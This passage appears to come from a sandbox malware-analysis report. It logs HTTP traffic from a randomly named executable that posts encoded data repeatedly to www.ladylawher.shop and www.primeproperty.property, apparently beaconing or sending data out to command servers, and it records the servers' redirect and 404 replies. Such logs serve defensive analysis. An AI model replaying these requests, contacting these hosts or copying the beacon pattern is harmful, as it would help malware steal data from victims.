                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            26192.168.2.22491873.33.130.19080652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:45.511606932 CET2472OUTPOST /i4bc/ HTTP/1.1
                                                                                                                            Host: www.ladylawher.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.ladylawher.shop
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.ladylawher.shop/i4bc/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 2f 44 52 76 4c 65 70 72 31 67 50 77 39 30 63 4a 56 4b 6d 63 4c 7a 52 63 69 41 47 55 4e 79 69 6e 37 71 5a 69 30 45 42 78 78 56 50 2b 47 74 44 37 46 36 70 45 31 45 4d 4e 52 48 5a 4e 64 61 59 44 66 57 59 51 59 4b 69 37 30 64 46 4b 48 58 4d 36 6f 34 4b 52 44 4e 55 33 51 57 42 35 4d 4a 62 6e 31 62 43 54 70 6c 2f 43 6b 56 5a 61 72 64 59 2b 47 4c 7a 38 73 50 73 67 54 67 7a 79 33 55 32 72 78 44 50 4b 79 34 73 77 42 63 75 73 6d 51 37 56 4e 39 31 34 52 55 71 6b 53 35 44 6a 61 79 4c 46 45 6c 42 69 52 69 4d 55 65 36 55 4b 41 4f 75 2f 39 73 30 6b 34 68 30 47 55 74 72 79 64 34 30 67 48 6c 62 50 2f 53 52 65 78 4c 4f 34 72 68 65 73 2f 6f 36 2b 78 46 64 6a 4e 37 64 55 6d 78 58 63 70 49 77 74 48 69 63 66 59 4f 77 53 57 70 6d 6a 55 42 74 57 2f 38 2f 68 58 69 63 79 31 45 39 66 78 44 43 41 6e 6d 59 39 33 51 35 49 44 76 53 70 67 6f 64 73 76 4b 61 38 56 48 65 42 65 54 64 55 61 36 70 6d 4e 71 4b 62 77 54 6f 39 79 45 45 30 2f 2b 50 78 63 56 55 78 6e 53 38 62 4c 33 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=C50OX9JFVNAfK/DRvLepr1gPw90cJVKmcLzRciAGUNyin7qZi0EBxxVP+GtD7F6pE1EMNRHZNdaYDfWYQYKi70dFKHXM6o4KRDNU3QWB5MJbn1bCTpl/CkVZardY+GLz8sPsgTgzy3U2rxDPKy4swBcusmQ7VN914RUqkS5DjayLFElBiRiMUe6UKAOu/9s0k4h0GUtryd40gHlbP/SRexLO4rhes/o6+xFdjN7dUmxXcpIwtHicfYOwSWpmjUBtW/8/hXicy1E9fxDCAnmY93Q5IDvSpgodsvKa8VHeBeTdUa6pmNqKbwTo9yEE0/+PxcVUxnS8bL38h+0f1eZ0OC2uPgzHfbYIJlbrFr+lZX1vqQYTs9uIfcDQQWzwi2T/XTj4wGZ8Ofvphl2t/8aNGXpB6DyFdSMO5NhZ1p6zCjlfIouAaKQT+w7GEmKN+4TIYqiyDOBrwissGQr5JK0wltHdoSbkxvf71iD1+gbzHN8G9fylKw8oHeB4rtE7dbbTAlgECDccAuOsPAIF4IZ4KQqTYPnMHT0Pk4Br2Q/ISxPGhQTV0GdjSKA8UGFfUtFOl5vZFhx2srQLZKFsEMpjYRz15sRxIGjGF7LkRzIKJsE3rnOW/NPvh1o0FzsbHG1UtXZk6a5/ncnH93uT+Xw2O9VZk+4XWB3ljFI0ijW1lWJ3FuNEqYthcFglWd6j3yev/pKfIQLvEJXKNV5bn3bcfdQi3mS8AZtGZ1QJfC1pgbsOqSSdQ4k9XSSl53geQWu0rcgZEFe3KwaQ8bKMWUQrN8bNS4YuIBajARSUTzUoIEUIPaWLCL4+EhfatGnNQl7LF4MF6suJcTOKoE1kgVE5/0VnvQQZC6FE+mto1I+82lqUeE+aq7W/Tx7+6q/gpfztdv6yCGti9e+BA3z77JgK9LlOI+kLaOBVOjxbtGHPDtbYWcE1LJCu8LLIvc45ZR51e5aXy9VwMp3TXCyaH8UM44CTcnu9SHY2fS6MbPyGr61+Y [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:51:45.516490936 CET288OUTData Raw: 48 42 5a 38 36 39 64 4d 31 6e 46 5a 47 74 65 4b 58 41 38 68 46 39 6a 78 61 4c 38 39 61 75 44 44 6a 62 50 44 57 4c 45 70 45 44 45 59 61 6b 35 31 6c 7a 72 4e 53 72 34 76 55 2b 79 50 53 69 63 41 50 79 78 4f 79 6f 54 59 76 48 53 74 72 55 70 75 6b 67
                                                                                                                            Data Ascii: HBZ869dM1nFZGteKXA8hF9jxaL89auDDjbPDWLEpEDEYak51lzrNSr4vU+yPSicAPyxOyoTYvHStrUpukg2dnjp3tLbw/oMCjo8r1pAADQdgV8enGglJ0cNDuLMc/soEPG4jee+Iq9yYUB1ONGnCCbNybXT2k0XyMrZ0y1mbKKmr2pGdE3gxQB2frk/HNa4oOEnWkQtl0F6J3YaOfdmLv98rG7aOjZpGvbrnWfYKG4chGiAUKP3


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            27192.168.2.22491883.33.130.19080652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:48.057593107 CET799OUTPOST /i4bc/ HTTP/1.1
                                                                                                                            Host: www.ladylawher.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.ladylawher.shop
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.ladylawher.shop/i4bc/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 38 62 52 75 5a 32 70 35 6c 67 50 78 39 30 63 48 31 4b 67 63 4c 2f 7a 63 6e 34 73 55 65 53 69 6e 4a 43 5a 69 48 73 42 30 78 56 41 6d 32 74 50 2f 46 36 38 45 31 45 32 4e 52 37 5a 4e 64 65 59 44 38 2b 59 53 5a 4b 68 6b 55 64 48 48 6e 58 4e 36 6f 31 32 52 44 78 45 33 51 75 42 35 4f 74 62 6d 30 72 43 58 4b 4e 2f 48 55 55 53 4f 62 64 44 2b 47 47 78 38 73 66 6b 67 51 45 7a 7a 47 49 32 6f 6c 58 50 64 7a 34 73 36 68 63 76 68 47 52 53 47 4f 73 69 34 77 55 44 75 6a 52 59 6c 65 79 76 59 56 42 7a 72 41 53 57 56 2f 4b 4a 56 41 2f 68 33 39 31 77 6d 41 3d 3d
                                                                                                                            Data Ascii: mFptYb=C50OX9JFVNAfK8bRuZ2p5lgPx90cH1KgcL/zcn4sUeSinJCZiHsB0xVAm2tP/F68E1E2NR7ZNdeYD8+YSZKhkUdHHnXN6o12RDxE3QuB5Otbm0rCXKN/HUUSObdD+GGx8sfkgQEzzGI2olXPdz4s6hcvhGRSGOsi4wUDujRYleyvYVBzrASWV/KJVA/h391wmA==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            28192.168.2.22491893.33.130.19080652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:50.600756884 CET2472OUTPOST /i4bc/ HTTP/1.1
                                                                                                                            Host: www.ladylawher.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.ladylawher.shop
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.ladylawher.shop/i4bc/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 64 4c 52 69 65 43 70 6f 31 67 4d 76 74 30 63 4a 56 4b 6b 63 4c 7a 7a 63 69 41 47 55 49 4b 69 6e 36 4b 5a 6a 6b 45 42 32 78 56 41 7a 6d 74 44 37 46 36 6d 45 31 51 63 4e 52 4c 6e 4e 66 79 59 44 62 36 59 51 62 53 69 73 45 64 46 57 33 58 4b 36 6f 30 73 52 44 42 41 33 51 36 37 35 4f 6c 62 6d 47 7a 43 52 36 4e 77 4c 30 55 53 4f 62 64 50 2b 47 47 4a 38 73 58 38 67 53 30 6a 79 33 34 32 6f 42 44 50 47 53 34 74 79 42 63 72 36 6d 51 31 56 4e 78 49 34 52 55 75 6b 53 39 39 6a 61 32 4c 58 69 70 42 69 57 57 50 57 4f 36 58 58 77 4f 75 78 64 73 36 6b 34 68 53 47 55 74 72 79 64 30 30 69 58 6c 62 50 2b 53 53 44 42 4c 4f 32 4c 68 44 78 50 6c 44 2b 78 51 38 6a 4d 4c 33 55 58 31 58 64 72 51 77 2f 6e 69 63 49 59 4f 32 53 57 70 52 6f 30 42 62 57 38 4e 41 68 58 53 79 79 31 45 39 66 79 62 43 57 30 65 59 2b 6e 51 35 56 7a 76 50 6e 41 6f 63 73 76 66 4e 38 55 7a 65 42 66 4c 64 62 4e 57 70 33 37 2b 4e 51 67 53 50 71 43 45 4b 77 2f 2f 4e 78 64 34 7a 78 6e 61 53 62 50 4c [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=C50OX9JFVNAfKdLRieCpo1gMvt0cJVKkcLzzciAGUIKin6KZjkEB2xVAzmtD7F6mE1QcNRLnNfyYDb6YQbSisEdFW3XK6o0sRDBA3Q675OlbmGzCR6NwL0USObdP+GGJ8sX8gS0jy342oBDPGS4tyBcr6mQ1VNxI4RUukS99ja2LXipBiWWPWO6XXwOuxds6k4hSGUtryd00iXlbP+SSDBLO2LhDxPlD+xQ8jML3UX1XdrQw/nicIYO2SWpRo0BbW8NAhXSyy1E9fybCW0eY+nQ5VzvPnAocsvfN8UzeBfLdbNWp37+NQgSPqCEKw//Nxd4zxnaSbPL8h7gf0/Z0Ny2vHAzDV7UcJlTJFryTZXVvqCwTkfWHHMDSVWz2m2TVXTuZwCV8OtPpihKt7LuOAnpGsDySPSMg5Nke1tejDTVfJYuAeskShw7PDmKbxYSPYqjBDKcWzSksGQ75JYcwltHa6Cbm7PDN1iO8+gHjHOkG+L2lK0goTOB40NE8X7auAl1xCC0qAeKsMmsF6Ol4bgqRUvnPEj1tk8dr2VPYS1zGgxTVlSJjaqA4XGFEUtFkl5iNFiJmso0LZItsCNpjChz07sRPCmj1F7D0R3IsJtM35TyW8/3vjVoqHzsbd212tXhe6fJFneHH9FWT43wxVNVYm+4UBR33jGw0ijS1lS93F91Eur1he1grSd61sCjK/papIR+qEKDKMANbgxnfatQgn2TzL5shZ1QFfAV5gp0OqDydDpk6VyTMzXgJe2uyrdM/EBLwKjOQ8b6MXmIrMMbNS4YpIBboARWqT24SIEUINLWLD+M+KBfTlmnsUl6WF44/6sG3cQKK6lVkgVE+xkVm1AQYC6Im+mtK1Iy8qGmUcWmapZ+/bx7+q6/h+Pzsdv7qCDBy9bKBRTH7ybIJyblTO+leUv8NOjMGtELPCefYXOg1K5Cu/rLL8c4sdRkke9Cxy5RgLYnTXxKaUvsN1oCQRHuFSHVGfSiEbOKWr79+Y [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:51:50.606282949 CET1752OUTData Raw: 48 42 35 38 36 63 64 4d 30 48 46 61 4f 4e 65 66 58 41 38 46 46 39 4c 66 61 4c 67 74 61 6f 2f 44 73 5a 48 44 46 6f 73 70 48 7a 45 61 61 6b 35 76 76 54 33 34 53 72 35 51 55 2b 47 50 53 69 73 41 50 31 6c 4f 79 59 54 48 67 58 53 73 78 45 70 6c 39 77
                                                                                                                            Data Ascii: HB586cdM0HFaONefXA8FF9LfaLgtao/DsZHDFospHzEaak5vvT34Sr5QU+GPSisAP1lOyYTHgXSsxEpl9w2RnjpjtJub/pkCj6Er2c0ACgdmOMeOCg5b0cB1uJEM4egEO0AjariI9NyZeh1JNG6tCYlYbWDPkAHyMbZ022CYdamtm5GQE3gNQB/YrlSKNesoOHPWlgtiw16PyYbJfdrAv90VG7KOjb9Gv77nBvYKE4cuPCAJFv7


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            29192.168.2.22491903.33.130.19080652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:53.139329910 CET533OUTGET /i4bc/?mFptYb=P7cuULF9RNNpbZDPqKeYgjgLveMcAQaoAqjHQXQRXIOUhYGrthov/zoo0UFBwEOwFncKEQzaM8iNIdWXCLam6BQfA1/n7ZwKXwFy7wLA2+dkqm2zT4ZxPQ5AZvg9&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.ladylawher.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:51:53.785733938 CET402INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:53 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 262
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 46 70 74 59 62 3d 50 37 63 75 55 4c 46 39 52 4e 4e 70 62 5a 44 50 71 4b 65 59 67 6a 67 4c 76 65 4d 63 41 51 61 6f 41 71 6a 48 51 58 51 52 58 49 4f 55 68 59 47 72 74 68 6f 76 2f 7a 6f 6f 30 55 46 42 77 45 4f 77 46 6e 63 4b 45 51 7a 61 4d 38 69 4e 49 64 57 58 43 4c 61 6d 36 42 51 66 41 31 2f 6e 37 5a 77 4b 58 77 46 79 37 77 4c 41 32 2b 64 6b 71 6d 32 7a 54 34 5a 78 50 51 35 41 5a 76 67 39 26 56 74 61 3d 6e 46 79 70 75 44 74 68 6f 6c 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mFptYb=P7cuULF9RNNpbZDPqKeYgjgLveMcAQaoAqjHQXQRXIOUhYGrthov/zoo0UFBwEOwFncKEQzaM8iNIdWXCLam6BQfA1/n7ZwKXwFy7wLA2+dkqm2zT4ZxPQ5AZvg9&Vta=nFypuDtholF"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            30192.168.2.2249191113.20.119.3180652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:59.047612906 CET2472OUTPOST /c1ti/ HTTP/1.1
                                                                                                                            Host: www.primeproperty.property
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.primeproperty.property
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.primeproperty.property/c1ti/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 68 74 50 51 31 4b 78 47 39 38 77 54 65 31 66 66 35 50 35 46 54 61 51 6e 33 66 67 36 4e 57 70 4c 30 67 4a 63 5a 47 36 64 69 5a 52 4d 6a 45 30 41 77 33 52 62 6b 2f 47 59 41 71 47 4c 6c 58 6d 34 59 4e 59 64 54 39 67 66 75 6a 6f 2b 72 4c 33 47 62 6b 6d 30 78 70 49 4a 76 4e 69 67 71 54 76 64 6f 6a 47 51 76 6c 72 6e 2f 44 58 52 69 2f 41 48 49 41 2f 44 49 73 56 68 39 65 6e 46 6f 43 56 49 38 4c 74 67 2b 72 41 7a 41 47 41 34 5a 2f 43 62 61 4b 37 73 6c 6f 4c 59 4f 49 48 35 45 47 47 57 6f 77 67 2f 47 38 78 50 71 45 6a 4a 4c 75 72 4f 4c 4f 77 76 6e 69 6d 62 4d 62 74 51 72 4b 61 6b 6b 6b 54 68 59 53 67 52 33 56 41 76 54 48 4a 48 2b 4e 62 46 57 36 37 31 31 62 6b 59 64 6c 62 6f 55 58 52 4c 72 71 54 42 48 4f 4c 4b 72 36 6d 6d 33 62 64 2f 31 74 50 57 4e 59 33 32 62 64 71 49 77 69 58 69 76 43 64 78 44 68 6e 4b 6f 57 50 51 5a 37 57 67 53 37 59 69 58 56 77 77 55 5a 63 6e 74 50 2b 63 64 79 4c 31 66 62 36 67 42 48 56 68 5a 78 6b 76 54 63 4e 30 4b 4f 6e 34 73 4d 46 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=ZU9pjJTMzahphtPQ1KxG98wTe1ff5P5FTaQn3fg6NWpL0gJcZG6diZRMjE0Aw3Rbk/GYAqGLlXm4YNYdT9gfujo+rL3Gbkm0xpIJvNigqTvdojGQvlrn/DXRi/AHIA/DIsVh9enFoCVI8Ltg+rAzAGA4Z/CbaK7sloLYOIH5EGGWowg/G8xPqEjJLurOLOwvnimbMbtQrKakkkThYSgR3VAvTHJH+NbFW6711bkYdlboUXRLrqTBHOLKr6mm3bd/1tPWNY32bdqIwiXivCdxDhnKoWPQZ7WgS7YiXVwwUZcntP+cdyL1fb6gBHVhZxkvTcN0KOn4sMFp2RINl1yvB5LLIRsv5O2Cscaw7GctbfEO9hTiGmS7m7Ikk2pssA9SS0TOppA+j6PrXDltR/H05FEkR/8E/iY/g542MfcbrQRFCVmAF8M6pUIEoUALA21kCoBHbIXOU/M6qa+I79FfnQIRE9TBI2u4v5wDBxcWXDMWvorrJB0qr53qsjKKr2jSGbdhyc0Ete6Iv7vkzNY4iSdAlBn2L+CFQyoiCrRH+K2yMbywjkSoArBApT2E97JVSm4AOBhsKMpAZvW2ruWr9U4IzW0WsJpWy8KB3BhBOJwevD0lFL1m9bNgnD2vcr869wqKjWTpotsG07ktlAKHFgWuadnM4Hat24XDZQYaXGFCV3q/8rXoYCzYJsW6jk2oUtYIG+HscGeIcnXOCHwzUskO27N9cYf3u80t8+k48m6QtnIQUoyK3SKE5aL2T7JoL7YDe550njcRnR9t8W8+1l0pgna4ONP87s8ciEJO+CDMYxmziw6PZjz8kfJ5b50JxwBz0GA4b0KDHAxkDpcM1Awfo7l9BVoyDhHlifzv8/Vil1MYW/ApGDJRoxTpmm0JHxkrl2YrOQpSZU93QdMu8+FPVHz1DsG0XIi0Cxp14iM8wnMnb7H+GRLd7mTVneVwIqbVt/LsivBN35Qu8yfhita+HB2cyxSDj8IN/uwG1nvfC [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:51:59.052722931 CET309OUTData Raw: 2f 37 62 68 76 32 6f 38 69 49 64 54 54 64 70 54 73 50 39 58 46 64 52 42 6c 77 75 63 7a 55 52 39 74 46 74 36 6c 4f 71 79 33 33 41 74 6f 76 49 74 6a 6f 44 30 53 33 54 46 4f 54 72 41 48 47 4b 31 33 4a 6b 38 34 61 4c 34 55 44 76 32 56 4d 71 30 46 2f
                                                                                                                            Data Ascii: /7bhv2o8iIdTTdpTsP9XFdRBlwuczUR9tFt6lOqy33AtovItjoD0S3TFOTrAHGK13Jk84aL4UDv2VMq0F/BVssEPVsIX4RS08xU6HSlONluDeC/8LCTsxp8qPkgtgJauomvqbHEz9XjgL5i2EGiqmPC2WsRNjSRIckrsewadPIc3pu+B0pUfr52P0u3C5F7BCWSqUbnnhUUgCj+zwbqnmmoPMRTfciEEmbaZIYWzUDOLikwtan2
                                                                                                                            Nov 7, 2024 10:52:00.149920940 CET717INHTTP/1.1 404 Not Found
                                                                                                                            Server: openresty/1.25.3.2
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:59 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 561
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                            Nov 7, 2024 10:52:00.360078096 CET717INHTTP/1.1 404 Not Found
                                                                                                                            Server: openresty/1.25.3.2
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:59 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 561
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            31192.168.2.2249192113.20.119.3180652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
